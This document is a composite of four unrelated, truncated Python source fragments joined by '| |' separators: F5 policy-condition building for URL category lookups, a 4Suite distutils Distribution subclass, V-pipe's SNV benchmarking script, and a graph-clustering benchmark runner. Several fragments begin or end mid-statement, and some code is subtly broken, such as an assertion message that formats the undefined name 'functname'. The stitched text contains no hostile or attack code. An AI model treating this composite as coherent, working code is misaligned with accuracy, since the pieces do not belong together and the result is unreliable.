raise F5ModuleError("The Category Lookup All condition requires a 'values' key and at least 1 category.")
try:
count = len(condition["values"])
except:
raise F5ModuleError("The Category Lookup All condition requires a 'values' key and at least 1 category.")
cond = copy.deepcopy(json_rule_category_lookup_all)
cond["index"] = random.randint(1000000000000, 9999999999999)
for value in condition["values"]:
value = re.sub('/Common/', '', value)
value = re.sub('_', ' ', value)
cond["options"]["category"].append(value)
ruleset["conditions"].append(cond)
## =================================
## Category Lookup HTTP Connect
## =================================
elif condition["condition"] == "categoryLookupConnect":
## input validation: policy type requires a "values" key, and contents must be >= 1
if "values" not in condition:
raise F5ModuleError("The Category Lookup Connect condition requires a 'values' key and at least 1 category.")
try:
count = len(condition["values"])
except:
raise F5ModuleError("The Category Lookup Connect condition requires a 'values' key and at least 1 category.")
cond = copy.deepcopy(json_rule_category_lookup_connect)
cond["index"] = random.randint(1000000000000, 9999999999999)
for value in condition["values"]:
value = re.sub('/Common/', '', value)
value = re.sub('_', ' ', value)
cond["options"]["category"].append(value)
ruleset["conditions"].append(cond)
## =================================
## Category Lookup SNI
## =================================
elif condition["condition"] == | |
import sys, os, warnings, email
from types import ClassType, ListType
from distutils import command, filelist, version
from distutils.cmd import Command
from distutils.core import Distribution, gen_usage, DEBUG
from distutils.errors import *
from distutils.fancy_getopt import FancyGetopt, wrap_text
try:
from distutils import log
except ImportError:
# Python 2.2; create an instance that has the module interface but acts
# like the announce() methods in 2.2.
class Log:
verbose = 1
def log(self, level, msg):
if self.verbose >= level:
print msg
sys.stdout.flush()
def set_verbosity(self, verbose):
self.verbose = verbose
log = Log()
else:
if sys.version < '2.5':
def _log(self, level, msg, args):
if level >= self.threshold:
if args:
msg %= args
print msg
sys.stdout.flush()
return
log.Log._log = _log
del _log
from Ft.Lib import Terminfo
from Ft.Lib.DistExt import Version
# Our new Distribution class
class Dist(Distribution):
"""
An enhanced version of core Distutils' Distribution class.
Currently supported features, for *all* Python (2.2+) versions:
(from Python 2.3+)
download_url, classifiers - PEP 314 metadata fields
(from Python 2.5+)
install_egg_info command - for setuptools
requires, provides, obsoletes - PEP 314 metadata fields
(only available in 4Suite)
requires_python - [PEP 345] a list of version restrictions for Python
requires_external - [PEP 345] a list of external requirements
command_mapping - maps command names to a module/class name that differs
from the actual command name
"""
# 'command_mapping' maps command names to the module/class names
command_mapping = {
'config' : 'Config',
'build' : 'Build',
'build_py' : 'BuildPy',
'build_ext' : 'BuildExt',
'build_clib' : None,
'build_scripts' : 'BuildScripts',
'build_l10n' : 'BuildL10n', # only in 4Suite
'clean' : None,
'install' : 'Install',
'install_lib' : 'InstallLib',
'install_headers' : None,
'install_scripts' : 'InstallScripts',
'install_data' : 'InstallData',
'install_egg_info' : 'InstallEggInfo', # new in 2.5+
'install_sysconf' : 'InstallSysconf', # only in 4Suite
'install_localstate' : 'InstallLocalState', # only in 4Suite
'install_devel' : 'InstallDevel', # only in 4Suite
#'install_man' : 'InstallMan', # only in 4Suite
'install_text' : 'InstallText', # only in 4Suite
#'install_info' : 'InstallInfo', # only in 4Suite
'install_l10n' : 'InstallL10n', # only in 4Suite
'install_config' : 'InstallConfig', # only in 4Suite
'sdist' : 'SDist',
'register' : None, # new in 2.3+
'bdist' : 'BDist',
'bdist_dumb' : None,
'bdist_rpm' : 'BDistRpm',
'bdist_inno' : 'BDistInno', # only in 4Suite
'bdist_msi' : None, # new in 2.5+
'bdist_egg' : 'BDistEgg',
'upload' : None, # new in 2.5+
'generate' : 'Generate', # only in 4Suite
'generate_bgen' : 'GenerateBisonGen', # only in 4Suite
'generate_l10n' : 'GenerateL10n', # only in 4Suite
}
command_aliases = {
'bdist_wininst' : 'bdist_inno',
}
standard_commands = ['config', 'build', 'clean', 'install', 'sdist',
'register', 'bdist', 'upload', 'generate']
if sys.version < '2.5':
standard_commands.remove('upload')
if sys.version < '2.3':
standard_commands.remove('register')
# 'toplevel_options' desribes the command-line options that may be
# supplied to the setup script prior to any actual command.
toplevel_options = []
# PKG-INFO is created for source distributions, so allow "developer"
# friendly features to be enabled/disabled (i.e., install_docs)
source_package = os.path.exists('PKG-INFO')
if not source_package:
toplevel_options.extend([
('source-package', 's',
'run as if from a source dist (developer testing)'),
])
def __init__(self, attrs):
# Add our placeholders for arguments from setup()
self.l10n = []
self.doc_files = []
self.bgen_files = []
self.sysconf_files = []
self.localstate_files = []
self.devel_files = []
# The module where configuration variables are written.
# Used by the 'install_config' command.
self.config_module = None
# File in source tree that represents the software copyright.
# Currently, only used by the 'bdist_inno' command.
self.license_file = None
# 'package' is the name of the subpackage.
self.package = None
# File in source tree that contains the setup attributes for the
# subpackage.
self.package_file = None
self.main_distribution = None
# Used for gathering and validating the files included in a source
# distribution. Used by the 'sdist' command.
self.manifest_templates = []
self.validate_templates = []
# Add support for build_py's 'package_data'. New in Python 2.4+
self.package_data = {}
# 'namespace_packages' is a list of package names whose contents are
# split across multiple distributions.
self.namespace_packages = None
Distribution.__init__(self, attrs)
return
def get_allfiles(self):
if self._allfiles is None:
# If a "main" distribution exists, use its files to prevent
# unnecessary additional searches.
if self.main_distribution:
self._allfiles = self.main_distribution.get_allfiles()
else:
source_list = filelist.FileList()
source_list.extend(filelist.findall())
# Remove files that don't really belong in the file list.
# Note the leading slash (\) before os.sep substitutions. It is
# needed to prevent regex-escaping when os.sep is '\' (Windows).
exclude_patterns = (
# revision control (CVS client) files
r'\%s?CVS(\.sandboxinfo)?\%s' % (os.sep, os.sep),
r'\.cvsignore$',
r'\.#[^\%s]+$' % os.sep,
# (X)Emacs temporary files
r'\.?#[^\%s]+#$' % os.sep,
# common editor backup files
r'[^\%s]+~$' % os.sep,
# python bytecode files
r'\.py[co]$',
)
for pattern in exclude_patterns:
source_list.exclude_pattern(pattern, is_regex=True)
self._allfiles = source_list.files
return self._allfiles
def get_source_files(self):
source_list = filelist.FileList()
source_list.set_allfiles(self.get_allfiles())
# Add the files used to create the Distribution
source_list.append(self.script_name)
if os.path.exists('setup.cfg'):
source_list.append('setup.cfg')
if self.package_file:
source_list.append(self.package_file)
# Get the source files from the command groupds
for cmd_name in ('generate', 'build', 'install'):
cmd = self.get_command_obj(cmd_name)
cmd.ensure_finalized()
source_list.extend(cmd.get_source_files())
# 'license_file' is used by bdist_inno
if self.license_file:
source_list.append(self.license_file)
# Add the files not included by the commands
for line in self.manifest_templates:
try:
source_list.process_template_line(line)
except DistutilsTemplateError, msg:
self.warn(str(msg))
# File list now complete -- sort it so that higher-level files
# come first
source_list.sort()
# Remove duplicates from the file list
source_list.remove_duplicates()
return source_list.files
# -- Config file finding/parsing methods ---------------------------
if sys.version < '2.4':
def parse_config_files(self, filenames=None):
Distribution.parse_config_files(self, filenames)
if 'global' in self.command_options:
global_options = self.command_options['global']
boolean_options = {'verbose':1, 'dry_run':1}
boolean_options.update(self.negative_opt)
for opt in global_options:
if opt not in boolean_options:
setattr(self, opt, global_options[opt][1])
return
# -- Command-line parsing methods ----------------------------------
if sys.version < '2.4':
def parse_command_line(self):
"""Parse the setup script's command line, taken from the
'script_args' instance attribute (which defaults to 'sys.argv[1:]'
-- see 'setup()' in core.py). This list is first processed for
"global options" -- options that set attributes of the Distribution
instance. Then, it is alternately scanned for Distutils commands
and options for that command. Each new command terminates the
options for the previous command. The allowed options for a
command are determined by the 'user_options' attribute of the
command class -- thus, we have to be able to load command classes
in order to parse the command line. Any error in that 'options'
attribute raises DistutilsGetoptError; any error on the
command-line raises DistutilsArgError. If no Distutils commands
were found on the command line, raises DistutilsArgError. Return
true if command-line was successfully parsed and we should carry
on with executing commands; false if no errors but we shouldn't
execute commands (currently, this only happens if user asks for
help).
"""
#
# We now have enough information to show the Macintosh dialog
# that allows the user to interactively specify the "command line".
#
toplevel_options = self._get_toplevel_options()
if sys.platform == 'mac':
import EasyDialogs
cmdlist = self.get_command_list()
self.script_args = EasyDialogs.GetArgv(
toplevel_options + self.display_options, cmdlist)
# We have to parse the command line a bit at a time -- global
# options, then the first command, then its options, and so on --
# because each command will be handled by a different class, and
# the options that are valid for a particular class aren't known
# until we have loaded the command class, which doesn't happen
# until we know what the command is.
self.commands = []
parser = FancyGetopt(toplevel_options + self.display_options)
parser.set_negative_aliases(self.negative_opt)
parser.set_aliases({'licence': 'license'})
args = parser.getopt(args=self.script_args, object=self)
option_order = parser.get_option_order()
log.set_verbosity(self.verbose)
# for display options we return immediately
if self.handle_display_options(option_order):
return
while args:
args = self._parse_command_opts(parser, args)
if args is None: # user asked for help (and got it)
return
# Handle the cases of --help as a "global" option, ie.
# "setup.py --help" and "setup.py --help command ...". For the
# former, we show global options (--verbose, --dry-run, etc.)
# and display-only options (--name, --version, etc.); for the
# latter, we omit the display-only options and show help for
# each command listed on the command line.
if self.help:
self._show_help(parser,
display_options=len(self.commands) == 0,
commands=self.commands)
return
# Oops, no commands found | |
<reponame>michalogit/V-pipe<filename>workflow/scripts/testBench.py
#!/usr/bin/env python3
import os
import argparse
from alignmentIntervals import read_fasta
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import sh
import numpy as np
import pandas as pd
__author__ = "<NAME>"
__license__ = "Apache2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
DBG = True if os.environ.get('DBG') is not None else False
def parse_args():
""" Set up the parsing of command-line arguments """
parser = argparse.ArgumentParser(
description="Benchmark: test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument(
"-f", required=True, default=None, metavar='FASTA',
dest='haplotype_seqs',
help="Fasta file containing either the sequences of the true "
"haplotypes or haplotypes sequences (msa) already reported using "
"the same indexing as the reference/consensus sequence"
)
requiredNamed.add_argument(
"-s", required=True, default=None, metavar='CSV', dest='snvs',
help="File containing called SNVs"
)
requiredNamed.add_argument(
"-N", required=False, default='sample', metavar='STR',
dest='sampleID', help="Patient/sample identifiers"
)
parser.add_argument(
"-m", required=False, default=None, metavar='FASTA',
dest='haplotype_master', type=str,
help="Fasta file containing the sequence with respect to which SNVs "
"were called"
)
parser.add_argument(
"--ref", required=False, default=None, metavar='FASTA',
dest='reference', type=str,
help="Fasta file containing the reference sequence with respect to "
"which reads were aligned"
)
parser.add_argument(
"-d", required=False, default='unif', metavar='str', dest='freq_dstr',
type=str, choices=['unif', 'geom', 'dirichlet', 'cust'],
help="Distribution of haplotype frequencies"
)
parser.add_argument(
"-gr", required=False, default=0.75, metavar='FLOAT', dest='ratio',
type=float, help="Sucess probability for the geometric distribution"
)
parser.add_argument(
"-df", required=False, default=None, metavar='FASTA',
dest='dirichlet_freqs', type=str,
help="File containing haplotype frequencies"
)
parser.add_argument(
"-ci", required=False, default=None, metavar='chrm:start-end',
dest='coverage_intervals', type=str,
help="File containing coverage intervals"
)
parser.add_argument(
"--no-expansion", required=False, default=False, action='store_true',
dest='no_expansion',
help="Coverage intervals do not correspond to region use to run "
"ShoRAH, but the actual target region"
)
parser.add_argument(
"--caller", required=False, default='shorah', metavar='str',
dest='snv_caller', type=str, choices=['shorah', 'lofreq'],
help="Inidcate if other software different from ShoRAH was used for "
"SNV calling"
)
parser.add_argument(
"-wl", required=False, default=201, metavar='INT', dest='window_len',
type=int,
help="Window length used by ShoRAH to construct overlapping windows"
)
parser.add_argument(
"-ws", required=False, default=3, metavar='INT', dest='window_shift',
type=int,
help="Number of window shifts used by ShoRAH to construct overlapping "
"windows"
)
parser.add_argument(
"-cf", required=False, default=None, metavar='TXT', dest='coverage',
type=str,
help="File to read coverage per window used by ShoRAH, or a "
"tab-separated values file containing coverage per locus"
)
parser.add_argument(
"-ms", required=False, default=False, action='store_true', dest='msa',
help="Indicate if the multiple sequence alignment including "
"reference/consensus sequence should be constructed"
)
parser.add_argument(
"--only-dels", required=False, default=False, action='store_true',
dest='only_deletions',
help="Indicate if only performance based on deletions should reported"
)
parser.add_argument(
"--long-dels", required=False, default=False, action='store_true',
dest='long_deletions',
help="Indicate if deletions should be parsed as multipe-base deletions"
)
parser.add_argument(
"-t", required=False, default=False, action='store_true',
dest='output_true',
help="Indicate if file containing expected SNVs should be reported. "
"Report using 1-based indexing for the position"
)
parser.add_argument(
"-mafft", required=False, default="mafft", metavar='PATH',
dest='mafft', type=str,
help="Path to binaries for the multiple sequence aligner MAFFT"
)
parser.add_argument(
"-of", required=False, default='performance.tsv', metavar='OUTPUT',
dest='outfile', type=str,
help="Output file - file containing expected SNVs"
)
parser.add_argument(
"-od", required=False, default=None, metavar='DIR', dest='outdir',
type=str, help="Output directory for intermediate files"
)
return parser.parse_args()
def frequencies(freq_dstr, num_haplotypes, ratio=0.75, infile=None):
"Compute the expected haplotype frequencies"
if freq_dstr == 'unif':
haplotype_freqs = np.repeat(1 / num_haplotypes, num_haplotypes)
elif freq_dstr == 'geom':
haplotype_freqs = [ratio**(i + 1) for i in range(num_haplotypes)]
haplotype_freqs = np.asarray(haplotype_freqs)
haplotype_freqs = haplotype_freqs / np.sum(haplotype_freqs)
elif freq_dstr == 'dirichlet':
# Read haplotype frequencies from output file
if infile is None:
raise IOError(
"Input file containing haplotype frequencies is expected")
ids, haplotype_freqs = read_fasta(infile)
haplotype_freqs = np.asarray(haplotype_freqs, dtype=float)
return haplotype_freqs
def parse_info(df, snvcaller):
if snvcaller == 'shorah':
df_info = pd.DataFrame.from_dict(
[dict([entry.strip().split("=") for entry in line.split(";")])
for line in df["INFO"]]).astype('float')
# We ignore columns with 0-counts to compute the SNV frequency. A zero
# count means that the SNV was not found in the corresponding window.
df_freq = df_info[["Freq1", "Freq2", "Freq3"]].copy()
df_freq[df_freq == 0] = np.nan
df_freq = df_freq.mean(axis=1)
elif snvcaller == 'lofreq':
df["INFO"] = df["INFO"].str.replace("INDEL", "INDEL=1")
df_info = pd.DataFrame.from_dict(
[dict([entry.strip().split("=") for entry in line.split(";")])
for line in df["INFO"]])
df_freq = df_info["AF"]
return df_freq
def parse_vcf(snvfile, snvcaller):
# Read VCF file to infer how many lines to skip
skiplines = 0
with open(snvfile, 'r') as infile:
for line in infile:
if not line.startswith('##'):
break
skiplines += 1
try:
df_snvs = pd.read_csv(snvfile, sep="\t", skiprows=skiplines, header=0,
compression=None)
df_snvs = df_snvs.rename(columns={'#CHROM': 'CHROM'})
df_snvs['FREQ'] = parse_info(df_snvs, snvcaller)
except pd.errors.EmptyDataError:
df_snvs = pd.DataFrame()
return df_snvs
def true_snvs(haplotype_master_arr, haplotype_master, haplotype_seqs,
num_haplotypes, haplotype_freqs, long_deletions, alphabet):
"""
Extract expected SNVs using the MSA of the true haplotype sequences and
the reference sequence
"""
# loci = np.arange(haplotype_master_arr.size)
haplotype_idx = np.arange(num_haplotypes)
variants = haplotype_master_arr != haplotype_seqs
df_snvs = pd.DataFrame(columns=('POS', 'REF', 'ALT', 'FREQ', 'HAPLOTYPES'))
num_snvs = 0
for locus in range(haplotype_master_arr.size):
idxs = variants[:, locus]
if np.any(idxs):
var = haplotype_seqs[idxs, locus]
snv_freq = haplotype_freqs[idxs]
if np.sum(idxs) == 1:
df_snvs.loc[num_snvs] = [
locus, haplotype_master_arr[locus].decode(),
var[0].decode(), snv_freq[0],
haplotype_idx[idxs].astype(str)[0]]
num_snvs += 1
else:
for base in alphabet:
idxs_base = var == base
if np.sum(idxs_base) > 0:
hap_aux = ','.join(
haplotype_idx[idxs][idxs_base].astype(str))
df_snvs.loc[num_snvs] = [
locus,
haplotype_master_arr[locus].decode(),
base.decode(), np.sum(snv_freq[idxs_base]),
hap_aux]
num_snvs += 1
df_snvs["POS"] = df_snvs["POS"].astype(int)
if long_deletions:
df_long_dels = pd.DataFrame({
'POS': pd.Series([], dtype='int'),
'REF': pd.Series([], dtype='str'),
'ALT': pd.Series([], dtype='str'),
'FREQ': pd.Series([], dtype='float'),
'HAPLOTYPES': pd.Series([], dtype='str')})
for idx, seq in enumerate(haplotype_seqs):
is_deletion = np.concatenate(([0], seq == b'-', [0]))
intervals = np.where(
np.abs(np.diff(is_deletion)) == 1)[0].reshape(-1, 2)
if intervals.size > 0:
assert (intervals[:, 0] > 0).all(), (
"Deletion reported in the first reference position")
# Deletions are by convention reported at the preceding
# position
dict_dels = {
'POS': intervals[:, 0] - 1,
'REF': [
haplotype_master[(x[0] - 1):x[1]] for x in intervals],
'ALT': [haplotype_master[x[0] - 1] for x in intervals],
'FREQ': [haplotype_freqs[idx]] * intervals.shape[0],
'HAPLOTYPES': [
str(haplotype_idx[idx])] * intervals.shape[0]
}
df_tmp = pd.DataFrame.from_dict(dict_dels)
df_long_dels = pd.concat(
[df_long_dels, df_tmp], ignore_index=True)
# Merge deletions found in different haplotypes together
grpby = df_long_dels.set_index(["POS", "REF", "ALT"])[
["FREQ", "HAPLOTYPES"]].groupby(["POS", "REF", "ALT"])
df_long_dels = pd.concat(
[grpby["FREQ"].sum(),
grpby["HAPLOTYPES"].apply(lambda s: ",".join(s))], axis=1)
df_long_dels.reset_index(inplace=True)
# Drop one-base deletions
del_mask = df_snvs["ALT"].str.startswith('-')
df_snvs = df_snvs[~del_mask]
df_snvs = pd.concat(
[df_snvs, df_long_dels], ignore_index=True)
df_snvs = df_snvs.set_index(["POS", "REF", "ALT"])
df_snvs = df_snvs.sort_index()
df_snvs.reset_index(inplace=True)
return df_snvs
def mafft(infile, outfile, max_iter=1000, thrd=4, mafft='mafft'):
"Use MAFFT to obtain the multiple sequence alignment"
# --nuc sequences are nucleotide
# --localpair pairwise alignments
# --maxiterate number of iterative refinement
cmd = sh.Command(mafft)
cmd = cmd.bake('--nuc')
cmd = cmd.bake('--preservecase')
cmd = cmd.bake('--maxiterate', max_iter)
cmd = cmd.bake('--localpair')
cmd = cmd.bake('--thread', thrd)
cmd = cmd.bake(infile)
cmd = cmd.bake(_out=outfile)
print(cmd)
cmd()
def consecutive(array, stepsize=1):
return np.split(array, np.where(np.diff(array) != stepsize)[0] + 1)
def target_snvs(start_region, end_region, start_locus, long_deletions,
end_locus=None):
if long_deletions:
is_contained = (start_locus >= start_region) & \
(end_locus < end_region)
else:
is_contained = (start_locus >= start_region) & \
(start_locus < end_region)
return is_contained
def main():
args = parse_args()
alphabet = ['-', 'A', 'C', 'G', 'T']
alphabet = np.array(alphabet, dtype='c')
# Compute average frequency for SNVs called using ShoRAH
df_snvs = parse_vcf(args.snvs, args.snv_caller)
if df_snvs.empty:
print("No called SNVs")
with open(args.outfile, 'w') as outfile:
outfile.write('ID\tTP\tFP\tFN\tTN\n')
return
# Drop insertions
ins_mask = df_snvs["ALT"].str.len() > 1
df_snvs = df_snvs[~ins_mask]
if args.only_deletions:
# Only look at deletions
# NOTE: temporary work-around while ShoRAH (v1.99.2) is modified to
# report indels complying to VCF format
if args.snv_caller == 'shorah':
is_deletion = df_snvs["ALT"] == '-'
elif args.snv_caller == 'lofreq':
is_deletion = df_snvs["REF"].str.len() > 1
df_snvs = df_snvs[is_deletion]
# NOTE: once ShoRAH (v1.99.2) is upgraded to report indels complying to
# VCF format, --long-dels can also be executed and raising an error
# won't be needed
if args.long_deletions and args.snv_caller == 'shorah':
raise ValueError("No curent support for --long-dels and ShoRAH")
if df_snvs.empty:
print("No called SNVs")
with open(args.outfile, 'w') as outfile:
outfile.write('ID\tTP\tFP\tFN\tTN\n')
return
if not args.long_deletions:
# Unroll deletions into one-base deletions
del_mask = df_snvs["REF"].str.len() > 1
assert (df_snvs.loc[del_mask, "ALT"] == df_snvs.loc[
del_mask, "REF"].str[0]).all(), (
"Reference base preceding deletion does not match")
del_len = df_snvs.loc[del_mask, "REF"].str.len() - 1
df_del = pd.DataFrame(
np.repeat(df_snvs[del_mask].values, del_len.to_list(), axis=0))
df_del.columns = df_snvs.columns
df_del["ALT"] = '-'
aux_idx = 0
aux_pos = df_del.columns.get_loc("POS")
aux_ref = df_del.columns.get_loc("REF")
for idx, row in df_snvs[del_mask].iterrows():
# ignore first base as it corresponds to the reference at the
# preceding locus
ref = list(row["REF"][1:])
pos = [row["POS"] + x + 1 for x in range(len(ref))]
df_del.iloc[aux_idx:(aux_idx + del_len[idx]), aux_pos] = pos
df_del.iloc[aux_idx:(aux_idx + del_len[idx]), aux_ref] = ref
aux_idx += del_len[idx]
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
\descr: List of the clustering algorithms to be executed by the benchmark and accessory routines.
Execution function for each algorithm must be named "exec<Algname>" and have the following signature:
def execAlgorithm(execpool, netfile, asym, timeout, pathid='', selfexec=False):
Execute the algorithm (stub)
execpool - execution pool to perform execution of current task
netfile - input network to be processed
asym - network links weights are assymetric (in/outbound weights can be different)
timeout - execution timeout for this task
pathid - path id of the net to distinguish nets with the same name located in different dirs.
Note: pathid is prepended with the separator symbol
selfexec - current execution is the external or internal self call
return - number of executions (jobs) made
\author: (c) <NAME> <<EMAIL>>
\organizations: eXascale Infolab <http://exascale.info/>, Lumais <http://www.lumais.com/>, ScienceWise <http://sciencewise.info/>
\date: 2015-07
"""
from __future__ import print_function # Required for stderr output, must be the first import
import os
import shutil
import glob
import sys
import inspect # To automatically fetch algorithm name
import traceback # Stacktrace
from datetime import datetime
from contrib.mpepool import *
from benchutils import *
from sys import executable as PYEXEC # Full path to the current Python interpreter
from benchutils import _SEPPARS
from benchevals import _SEPNAMEPART
from benchevals import _ALGSDIR
from benchevals import _RESDIR
from benchevals import _CLSDIR
from benchevals import _EXTERR
from benchevals import _EXTEXECTIME
from benchevals import _EXTAGGRES
from benchevals import _EXTAGGRESEXT
_EXTLOG = '.log'
_EXTCLNODES = '.cnl' # Clusters (Communities) Nodes Lists
_APREFIX = 'exec' # Prefix of the executing application / algorithm
def aggexec(algs):
"""Aggregate execution statistics
Aggregate execution results of all networks instances and shuffles and output average,
and avg, min, max values for each network type per each algorithm.
Expected format of the aggregating files:
# ExecTime(sec) CPU_time(sec) CPU_usr(sec) CPU_kern(sec) RSS_RAM_peak(Mb) TaskName
0.550262 0.526599 0.513438 0.013161 2.086 syntmix/1K10/1K10^1!k7.1#1
...
algs - algorithms were executed, which resource consumption should be aggregated
#>>> aggexec(['scp', 'ganxis']) is None
#True
"""
#exectime = {} # netname: [alg1_stat, alg2_stat, ...]
mnames = ('exectime', 'cputime', 'rssmem') # Measures names; ATTENTION: for the correct output memory must be the last one
measures = [{}, {}, {}] # exectiem, cputime, rssmem
malgs = [] # Measured algs
ialg = 0 # Algorithm index
for alg in algs:
algesfile = ''.join((_RESDIR, alg, _EXTEXECTIME))
try:
with open(algesfile, 'r') as aest:
malgs.append(alg)
for ln in aest:
# Strip leading spaces
ln = ln.lstrip()
# Skip comments
if not ln or ln[0] == '#':
continue
# Parse the content
fields = ln.split(None, 5)
# Note: empty and spaces strings were already excluded
assert len(fields) == 6, (
'Invalid format of the resource consumption file "{}": {}'.format(algesfile, ln))
# Fetch and accumulate measures
# Note: rstrip() is required, because fields[5] can ends with '\n'; os.path.split(...)[1]
net = delPathSuffix(fields[5].rstrip(), True) # Note: name can't be a path here
#print('> net: >>>{}<<< from >{}<'.format(net, fields[5]), file=sys.stderr)
assert net, 'Network name must exist'
etime = float(fields[0])
ctime = float(fields[1])
rmem = float(fields[4])
for imsr, val in enumerate((etime, ctime, rmem)):
netstats = measures[imsr].setdefault(net, [])
if len(netstats) <= ialg:
assert len(netstats) == ialg, 'Network statistics are not synced with algorithms: ialg={}, net: {}, netstats: {}'.format(ialg, net, netstats)
netstats.append(ItemsStatistic('_'.join((alg, net)), val, val))
netstats[-1].add(val)
except IOError:
print('WARNING, execution results for "{}" do not exist, skipped.'.format(alg), file=sys.stderr)
else:
ialg += 1
# Check number of the algorithms to be outputted
if not malgs:
print('WARNING, there are no any algortihms execution results to be aggregated.', file=sys.stderr)
return
# Output resutls
timestamp = datetime.utcnow()
for imsr, measure in enumerate(mnames):
resfile = ''.join((_RESDIR, measure, _EXTAGGRES))
resxfile = ''.join((_RESDIR, measure, _EXTAGGRESEXT))
try:
with open(resfile, 'a') as outres, open(resxfile, 'a') as outresx:
# The header is unified for multiple outputs only for the outresx
if not os.path.getsize(resxfile):
outresx.write('# <network>\n#\t<alg1_outp>\n#\t<alg2_outp>\n#\t...\n') # ExecTime(sec), ExecTime_avg(sec), ExecTime_min\tExecTime_max
# Output timestamp
outres.write('# --- {} ---\n'.format(timestamp))
outresx.write('# --- {} ---\n'.format(timestamp))
# Output header, which might differ for distinct runs by number of algs
outres.write('# <network>')
for alg in malgs:
outres.write('\t{}'.format(alg))
outres.write('\n')
# Output results for each network
for netname, netstats in measures[imsr].iteritems():
outres.write(netname)
outresx.write(netname)
for ialg, stat in enumerate(netstats):
if not stat.fixed:
stat.fix()
# Output sum for time, but avg for mem
val = stat.sum if imsr < len(mnames) - 1 else stat.avg
outres.write('\t{:.3f}'.format(val))
outresx.write('\n\t{}>\ttotal: {:.3f}, per_item: {:.6f} ({:.6f} .. {:.6f})'
.format(malgs[ialg], val, stat.avg, stat.min, stat.max))
outres.write('\n')
outresx.write('\n')
except IOError as err:
print('ERROR, "{}" results output execution is failed: {}. {}'
.format(measure, err, traceback.format_exc()), file=sys.stderr)
def preparePath(taskpath):
"""Create the path if required, otherwise move existent data to backup.
All itnstances and shuffles of each network are handled all together and only once,
even on calling this function for each shuffle.
NOTE: To process files starting with taskpath, it should not contain '/' in the end
taskpath - the path to be prepared
"""
# Backup existent files & dirs with such base only if this path exists and is not empty
# ATTENTION: do not use only basePathExists(taskpath) here to avoid movement to the backup
# processing paths when xxx.mod.net is processed before the xxx.net (have the same base)
if os.path.exists(taskpath) and not dirempty(taskpath):
mainpath = delPathSuffix(taskpath)
backupPath(mainpath, True)
# Create target path if not exists
if not os.path.exists(taskpath):
os.makedirs(taskpath)
# ATTENTION: this function should not be defined to not beight automatically executed
#def execAlgorithm(execpool, netfile, asym, timeout, pathid='', selfexec=False, **kwargs):
# """Execute the algorithm (stub)
#
# execpool - execution pool to perform execution of current task
# netfile - input network to be processed
# asym - network links weights are assymetric (in/outbound weights can be different)
# timeout - execution timeout for this task
# pathid - path id of the net to distinguish nets with the same name located in different dirs.
# Note: pathid is prepended with the separator symbol
# selfexec=False - current execution is the external or internal self call
# kwargs - optional algorithm-specific keyword agguments
#
# return - number of executions (executed jobs)
# """
# assert execpool and netfile and (asym is None or isinstance(asym, bool)) and timeout + 0 >= 0, (
# 'Invalid input parameters:\n\texecpool: {},\n\tnet: {},\n\tasym: {},\n\ttimeout: {}'
# .format(execpool, netfile, asym, timeout))
# # ATTENTION: for the correct execution algname must be always the same as func lower case name without the prefix "exec"
# algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain_igraph'
# return 0
def funcToAppName(funcname):
"""Fetch name of the execution application by the function name"""
assert funcname.startswith(_APREFIX), 'Executing appliation is expected instead of "{}"'.format(functname)
return funcname[len(_APREFIX):].lower()
# Louvain
## Original Louvain
#def execLouvain(execpool, netfile, asym, timeout, pathid='', tasknum=0):
# """Execute Louvain
# Results are not stable => multiple execution is desirable.
#
# tasknum - index of the execution on the same dataset
# """
# # Fetch the task name and chose correct network filename
# netfile = os.path.splitext(netfile)[0] # Remove the extension
# task = os.path.split(netfile)[1] # Base name of the network
# assert task, 'The network name should exists'
# if tasknum:
# task = '-'.join((task, str(tasknum)))
# netfile = '../' + netfile # Use network in the required format
#
# algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain'
# # ./community graph.bin -l -1 -w graph.weights > graph.tree
# args = ('../exectime', ''.join(('-o=../', _RESDIR, algname, _EXTEXECTIME)), ''.join(('-n=', task, pathid)), '-s=/etime_' + algname
# , './community', netfile + '.lig', '-l', '-1', '-v', '-w', netfile + '.liw')
# execpool.execute(Job(name=_SEPNAMEPART.join((algname, task)), workdir=_ALGSDIR, args=args
# , timeout=timeout, stdout=''.join((_RESDIR, algname, '/', task, '.loc'))
# , stderr=''.join((_RESDIR, algname, '/', task, _EXTLOG))))
# return 1
#
#
#def evalLouvain(execpool, basefile, measure, timeout):
# return
def execLouvain_igraph(execpool, netfile, asym, timeout, pathid='', selfexec=False):
"""Execute Louvain
Results are not stable => multiple execution is desirable.
returns number of executions or None
"""
assert execpool and netfile and (asym is None or isinstance(asym, bool)) and timeout + 0 >= 0, (
'Invalid input parameters:\n\texecpool: {},\n\tnet: {},\n\tasym: {},\n\ttimeout: {}'
.format(execpool, netfile, asym, timeout))
# Fetch the task name and chose correct network filename
netfile, netext = os.path.splitext(netfile) # Remove the extension
task = os.path.split(netfile)[1] # Base name of the network
assert task, 'The network name should exists'
#if tasknum:
# task = '_'.join((task, str(tasknum)))
# ATTENTION: for the correct execution algname must be always the same as func lower case name without the prefix "exec"
algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain_igraph'
# ./louvain_igraph.py -i=../syntnets/1K5.nsa -ol=louvain_igoutp/1K5/1K5.cnl
taskpath = ''.join((_RESDIR, algname, '/', _CLSDIR, task, pathid))
preparePath(taskpath)
## Louvain accumulated statistics over shuffled modification of the network or total statistics for all networks
#extres = '.acs'
#if not selfexec:
# outpdir = ''.join((_RESDIR, algname, '/'))
# if not os.path.exists(outpdir):
# os.makedirs(outpdir)
# # Just erase the file of the accum results
# with open(taskpath + extres, 'w') as accres:
# accres.write('# Accumulated results for the shuffles\n')
#
#def postexec(job):
# """Copy final modularity output to the separate file"""
# # File name of the accumulated result
# # Note: here full path is required
# accname = ''.join((_ALGSDIR, _RESDIR, algname, extres))
# with open(accname, 'a') as accres: # Append to the end
# # TODO: Evaluate the average
# subprocess.call(('tail', '-n 1', taskpath + _EXTLOG), stdout=accres)
args = ('../exectime', ''.join(('-o=../', _RESDIR, algname, _EXTEXECTIME)), ''.join(('-n=', task, pathid)), '-s=/etime_' + algname
# Note: igraph-python is a Cython wrapper around C igraph lib. Calls are much faster on CPython than on PyPy
